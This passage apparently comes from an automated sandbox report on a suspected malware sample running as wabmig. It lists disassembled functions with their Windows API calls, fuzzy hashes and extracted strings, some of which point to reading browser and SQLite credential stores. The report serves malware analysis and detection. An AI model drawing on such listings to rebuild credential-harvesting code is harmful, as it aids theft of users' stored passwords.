                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                            Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                            • String ID:
                                                                            • API String ID: 3015003838-0
                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                            Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00407E44
                                                                            • memset.MSVCRT ref: 00407E5B
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                            • wcscpy.MSVCRT ref: 00407F10
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                            • String ID:
                                                                            • API String ID: 59245283-0
                                                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                            Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                            • free.MSVCRT ref: 004185AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                            • String ID:
                                                                            • API String ID: 2802642348-0
                                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                            Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                            • API String ID: 3510742995-3273207271
                                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                            Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                            • memset.MSVCRT ref: 00413ADC
                                                                            • memset.MSVCRT ref: 00413AEC
                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                            • memset.MSVCRT ref: 00413BD7
                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                            • String ID: 3A
                                                                            • API String ID: 3300951397-293699754
                                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                            Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                            • String ID: strings
                                                                            • API String ID: 3166385802-3030018805
                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                            Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00411AF6
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                                            • wcscat.MSVCRT ref: 00411B2E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                            • String ID: AE$.cfg$General$EA
                                                                            • API String ID: 776488737-1622828088
                                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                            Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D8BD
                                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                            • memset.MSVCRT ref: 0040D906
                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                            • String ID: sysdatetimepick32
                                                                            • API String ID: 1028950076-4169760276
                                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                            Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                            • memset.MSVCRT ref: 0041BA3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: -journal$-wal
                                                                            • API String ID: 438689982-2894717839
                                                                            • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                            • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                            Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Dialog$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3975816621-0
                                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                            Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                                            • String ID: .save$http://$https://$log profile$signIn
                                                                            • API String ID: 1214746602-2708368587
                                                                            • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                            • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                            Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                            • memset.MSVCRT ref: 00405E33
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                            • String ID:
                                                                            • API String ID: 2313361498-0
                                                                            • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                            • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                            Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageRectSend$Client
                                                                            • String ID:
                                                                            • API String ID: 2047574939-0
                                                                            • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                            • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                            Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                            • String ID:
                                                                            • API String ID: 4218492932-0
                                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                            Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: gj
                                                                            • API String ID: 438689982-4203073231
                                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                            Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                            • API String ID: 3510742995-2446657581
                                                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                            Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                            • memset.MSVCRT ref: 00405ABB
                                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                            • SetFocus.USER32(?), ref: 00405B76
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$FocusItemmemset
                                                                            • String ID:
                                                                            • API String ID: 4281309102-0
                                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                            Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfwcscat
                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                            • API String ID: 384018552-4153097237
                                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                            Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
